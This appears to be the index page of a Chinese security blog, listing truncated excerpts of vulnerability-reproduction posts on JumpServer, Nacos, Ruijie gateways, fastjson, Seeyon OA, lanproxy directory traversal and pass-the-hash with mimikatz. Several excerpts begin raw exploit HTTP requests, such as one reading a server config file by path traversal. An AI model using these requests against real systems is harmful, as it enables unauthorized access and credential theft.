JumpServer远程执行漏洞 复现

首先。安装 安装脚本V2.6.1 https://www.o2oxy.cn/wp-content/uploads/2021/01/quick_start.zip github 安装脚本全部是安装最新版的。 安装的时候注意几个坑。 ...

Nacos 未授权访问

用户列表size代表用户数量 GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 Host: x.x.x.x User-Agent: Nacos-Server Connection: close ...

密码保护:常用java 利用工具

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxx...

锐捷网关系列通杀GetShell

https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...

密码保护:某OA fastjson 复现

某OA 在某些低版本使用了fastjson  1.2.58  。导致了前台的一个fastjson 的Rce   User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Fi...

密码保护:致远OA 任意文件上传

老版本 POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application...

CVE-2020-3091 lanproxy 目录遍历

/../conf/config.properties GET /../conf/config.properties HTTP/1.1 Host: 192.168.10.10:881 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (W...

密码保护:某客服CMS代码审计

无意中某朋友发了一个客户系统源码给我。就顺着系统审计了一番。 总共审计了一个前台RCE、前台SQL 注入、后台RCE 、前台存储XSS、反射XSS  以及后台SQL 注入 源码就不发了。具体的代码如下:...

内网hash 传递

首先通过mimikatz 抓取明文密码 mimikatz  1.通过wmiexec https://github.com/maaaaz/impacket-examples-windows python  -m pip&nb...